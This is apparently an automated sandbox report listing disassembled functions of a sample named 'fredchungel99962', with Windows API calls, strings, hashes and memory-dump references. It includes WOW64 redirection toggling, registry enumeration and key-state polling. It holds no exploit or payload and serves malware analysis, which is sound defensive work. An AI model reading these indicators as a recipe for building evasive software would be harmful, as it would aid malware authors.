Opcode ID: f5fc9c9a043ceca83567b78987576ec13ae4ccc95259ab194904ab7f4a7ad325
Instruction ID: d0177933fe16161a3faef86b7e80c323bdfdc8a665dc46e811636001e447699e
Opcode Fuzzy Hash: f5fc9c9a043ceca83567b78987576ec13ae4ccc95259ab194904ab7f4a7ad325
Instruction Fuzzy Hash: 9A21CD71200209AFEF214F68EC80EBB7BEDEB49368F904618FA50E2191D771FC959760

Uniqueness

Uniqueness Score: -1.00%

Function 01348FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

GetCursorPos.USER32(?), ref: 01349001
TrackPopupMenuEx.USER32 ref: 01349016
GetCursorPos.USER32(?), ref: 0134905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,01307711,?,?,?), ref: 01349094

Strings

8lr, xrefs: 0134902E, 01349064

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: 8lr
API String ID: 2864067406-2725927297
Opcode ID: 4c33bc967c5c6fac55a82d97aef5d16cc97b1b59c2266c37972cf4ff0e010ae5
Instruction ID: 8e1ddd3010002c8a0ddba3a0424a7e5ca53d578ff0da738c0b12b21adb484758
Opcode Fuzzy Hash: 4c33bc967c5c6fac55a82d97aef5d16cc97b1b59c2266c37972cf4ff0e010ae5
Instruction Fuzzy Hash: 6621AD35601118EFDB25CFA8C848FFB7BF9EB49358F044095FA0547251C731A990DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012D4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,012D4D1E,012E28E9,?,012D4CBE,012E28E9,013788B8,0000000C,012D4E15,012E28E9,00000002), ref: 012D4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,012D4D1E,012E28E9,?,012D4CBE,012E28E9,013788B8,0000000C,012D4E15,012E28E9,00000002), ref: 012D4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,012D4D1E,012E28E9,?,012D4CBE,012E28E9,013788B8,0000000C,012D4E15,012E28E9,00000002,00000000), ref: 012D4DC3

Strings

CorExitProcess, xrefs: 012D4D98
mscoree.dll, xrefs: 012D4D86

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4010afa50718c95a37e6aadbd1b38cf59a58c8d705650f8a93f964c654a597b0
Instruction ID: 5468c4038372e31484cc9dc23b73f5155b7c7d258bb8002b33cd78122e9202ab
Opcode Fuzzy Hash: 4010afa50718c95a37e6aadbd1b38cf59a58c8d705650f8a93f964c654a597b0
Instruction Fuzzy Hash: ACF0C234A11209BBEB219F94D809BADBFB8EF04711F0000A8FA05A2250CF319A40CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 0130D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0130D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0130D3BF
FreeLibrary.KERNEL32(00000000), ref: 0130D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0130D3B9
X64, xrefs: 0130D2A8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 0ca8f86f1ed9581fd895cd78437ed57f1184f9f30578ea014087d2a1ac598a30
Instruction ID: 595b45cff3db75ece7f069ef1237914c28d039468f57a781863b15ce93f7c76a
Opcode Fuzzy Hash: 0ca8f86f1ed9581fd895cd78437ed57f1184f9f30578ea014087d2a1ac598a30
Instruction Fuzzy Hash: 55F05539406620EBD73312D8883896AB7DCAF00B19F406188F503E1088DB60D940CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 012B4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 012B4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,012B4EDD,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EAE
FreeLibrary.KERNEL32(00000000,?,?,012B4EDD,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4EC0

Strings

kernel32.dll, xrefs: 012B4E94
Wow64DisableWow64FsRedirection, xrefs: 012B4EA8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 97421bd4bf4d00048d35ec091ba4f0ea5ed461fe860624a11ab065b89e79185e
Instruction ID: 68aa5c86e7133c963f4aae91168287c6179dd62cf84a522b17bd152888ac77dc
Opcode Fuzzy Hash: 97421bd4bf4d00048d35ec091ba4f0ea5ed461fe860624a11ab065b89e79185e
Instruction Fuzzy Hash: 3FE0CD39A175235BE332262D6C98B9FAD9C9F81FA2F050115FF02D2205DF64D9018AA1

Uniqueness

Uniqueness Score: -1.00%

Function 012B4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll), ref: 012B4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,012F3CDE,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4E74
FreeLibrary.KERNEL32(00000000,?,?,012F3CDE,?,01381418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 012B4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 012B4E6E
kernel32.dll, xrefs: 012B4E5B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: d8ce80a8480fb2f2bdfef7b498a64b060b16bd2b9447d79fcb84e2ef59c6617a
Instruction ID: 1082c840dfec418384011825e6f5480dc05152607ec5f1605ff7969916154fd2
Opcode Fuzzy Hash: d8ce80a8480fb2f2bdfef7b498a64b060b16bd2b9447d79fcb84e2ef59c6617a
Instruction Fuzzy Hash: EBD0C239517A6257E7322A296848DCB6F1C9F81BA53050114FB02A2208CF20E901CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 0133A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0133A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0133A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0133A468
CloseHandle.KERNEL32(?), ref: 0133A63D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 003b7c057c59731b64b3ffb4fe61f4a883fb53c8ae81f1958a3d8dde9e6777e9
Instruction ID: 82fac7ed157aa17c8ad0276982d71ea337666fb25cb0418f782170b7cc681f1f
Opcode Fuzzy Hash: 003b7c057c59731b64b3ffb4fe61f4a883fb53c8ae81f1958a3d8dde9e6777e9
Instruction Fuzzy Hash: BEA1AC71604301AFE720DF28C885F2AB7E5AF94718F04885DF99ADB2D1DBB1EC418B95

Uniqueness

Uniqueness Score: -1.00%

Function 012EBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01353700), ref: 012EBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0138121C,000000FF,00000000,0000003F,00000000,?,?), ref: 012EBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,01381270,000000FF,?,0000003F,00000000,?), ref: 012EBC36
_free.LIBCMT ref: 012EBB7F

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012EBD4B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0e890740cf2bfa29459088fcb9c45b89e82eb20ebc1be5b60f6ed9f518f0ef56
Instruction ID: 28487384b2b0eac4852d19f3de82d14f35e08228e876f0afc83d4b9aa0d86134
Opcode Fuzzy Hash: 0e890740cf2bfa29459088fcb9c45b89e82eb20ebc1be5b60f6ed9f518f0ef56
Instruction Fuzzy Hash: 08510C71D1420ADFDB20EF69DC899BEBBFCEF40350F90026AD654D7194EB309A418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0131E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0131DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0131CF22,?), ref: 0131DDFD

Part of subcall function 0131DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0131CF22,?), ref: 0131DE16

Part of subcall function 0131E199: GetFileAttributesW.KERNEL32(?,0131CF95), ref: 0131E19A

lstrcmpiW.KERNEL32(?,?), ref: 0131E473
MoveFileW.KERNEL32 ref: 0131E4AC
_wcslen.LIBCMT ref: 0131E5EB
_wcslen.LIBCMT ref: 0131E603
SHFileOperationW.SHELL32 ref: 0131E650

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: b726978b3fa0c7edd6e2d78f0ae9bcbfecbed9b5715de0eca1b0850105fdc454
Instruction ID: 74112352c4357cbecf8c3019166097cb68f0a893272c30c2068577d68b8a62e4
Opcode Fuzzy Hash: b726978b3fa0c7edd6e2d78f0ae9bcbfecbed9b5715de0eca1b0850105fdc454
Instruction Fuzzy Hash: 8851A7B24083869BD739DB94DC809EF77ECAF94344F00492EE689D3154EF75B1888766

Uniqueness

Uniqueness Score: -1.00%

Function 0133B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

Part of subcall function 0133C998: CharUpperBuffW.USER32(?,?), ref: 0133C9B5
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133C9F1
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA68
Part of subcall function 0133C998: _wcslen.LIBCMT ref: 0133CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0133BAA5
RegOpenKeyExW.ADVAPI32 ref: 0133BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0133BB63
RegCloseKey.ADVAPI32(?), ref: 0133BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0133BBB3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 09bedeb75ea3c9e06165e25e41eef39ce9f85fd71ce5fa251ab3036b2403ef24
Instruction ID: c54be8f48fed5263fbe1a32d2809e5968d0c8382ba2c78c2e0a0ad480d92d79e
Opcode Fuzzy Hash: 09bedeb75ea3c9e06165e25e41eef39ce9f85fd71ce5fa251ab3036b2403ef24
Instruction Fuzzy Hash: CC61BF31218241AFD724DF28C4D0E6ABBE9FF84348F14855DF5998B2A5CB31ED46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01318BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01318BCD
VariantClear.OLEAUT32 ref: 01318C3E
VariantClear.OLEAUT32 ref: 01318C9D
VariantClear.OLEAUT32(?), ref: 01318D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01318D3B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: fbd441075c74d98eb087218e78ab31a76617fc03bd0800799160d3754477d2fe
Instruction ID: 458f02a7453dcc934916013dde4191e7229cb26b058e553538e2b38a75d71d98
Opcode Fuzzy Hash: fbd441075c74d98eb087218e78ab31a76617fc03bd0800799160d3754477d2fe
Instruction Fuzzy Hash: 605159B5A01219EFCB14CF68C884AAABBF8FF89314F058559E905EB314E730E911CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01328AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 01328BAE
GetPrivateProfileSectionW.KERNEL32 ref: 01328BDA
WritePrivateProfileSectionW.KERNEL32 ref: 01328C32
WritePrivateProfileStringW.KERNEL32 ref: 01328C57
WritePrivateProfileStringW.KERNEL32 ref: 01328C5F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 56989256f4c146420b3c6ece9e2c653fb85e7d0e1788adc126c766115afd7dc1
Instruction ID: 05b3afec46a707885a796f2f1fe8dc1fb15e32526e461709681a1970f85acfc9
Opcode Fuzzy Hash: 56989256f4c146420b3c6ece9e2c653fb85e7d0e1788adc126c766115afd7dc1
Instruction Fuzzy Hash: D5514A75A002259FDF15DF64C880AA9BBF5FF48354F088498E949AB3A1DB31ED51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01338EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 01338F40
GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 01338FD0
GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 01338FEC
GetProcAddress.KERNEL32(00000000,?,00000041), ref: 01339032
FreeLibrary.KERNEL32(00000000), ref: 01339052

Part of subcall function 012CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01321043,?,759D3F18), ref: 012CF6E6
Part of subcall function 012CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0130FA64,00000000,00000000,?,?,01321043,?,759D3F18,?,0130FA64), ref: 012CF70D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: c5a68e2105e6c2f64ab70af09c342fc8e7eb127b676655510b080826fa3ab8b9
Instruction ID: fb3a0390dedf97c44768473af36b1b028b88844826d6092d9d67499d40076bab
Opcode Fuzzy Hash: c5a68e2105e6c2f64ab70af09c342fc8e7eb127b676655510b080826fa3ab8b9
Instruction Fuzzy Hash: E6515A34605205DFCB11DF68C4849ADBBF5FF99318B048198E90A9B761DB31ED85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012E2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 012E20C3
_free.LIBCMT ref: 012E20E3

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5a2f1c2972204f7259496988635004c0d575d49ee4d5f6fa323ebe13c03f956f
Instruction ID: de083d4a7a57c8dc996155365fd34d7fe795130be581585bd76d39b465e70a9b
Opcode Fuzzy Hash: 5a2f1c2972204f7259496988635004c0d575d49ee4d5f6fa323ebe13c03f956f
Instruction Fuzzy Hash: 9C41E436A10201DFCB25DF78C884A6DB7EAEF99710F554568E616EB392D631ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012C912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 012C9141
ScreenToClient.USER32(00000000,?), ref: 012C915E
GetAsyncKeyState.USER32 ref: 012C9183
GetAsyncKeyState.USER32 ref: 012C919D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f545e83ae095c205b8916f1e5aad639d91ab053abbe30f4b176f566e42163027
Instruction ID: 27180215344bacc71619484c4bde90da594117ae543189851ab7aef897111e5a
Opcode Fuzzy Hash: f545e83ae095c205b8916f1e5aad639d91ab053abbe30f4b176f566e42163027
Instruction Fuzzy Hash: 39417031A0450AFBDF1A9F68C854BEEBBB5FB45728F108319E565A32D0C7706990CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01323874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 013238CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 01323922
TranslateMessage.USER32(?), ref: 0132394B
DispatchMessageW.USER32(?), ref: 01323955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01323966

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 7d8085f7134a52114e970d14665471584ff3fee88d5c031b144af0127c831270
Instruction ID: b543080079afbe0f91510bc58e266d53fdb218f08b732e87639ccfc5d2417dfb
Opcode Fuzzy Hash: 7d8085f7134a52114e970d14665471584ff3fee88d5c031b144af0127c831270
Instruction Fuzzy Hash: D031C470A043669FEB35EB389449BBA3FACFB0E308F040569D56287585E7B89085CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01311901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 01311915
PostMessageW.USER32 ref: 013119C1
Sleep.KERNEL32(00000000,?,?,?), ref: 013119C9
PostMessageW.USER32 ref: 013119DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 013119E2

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
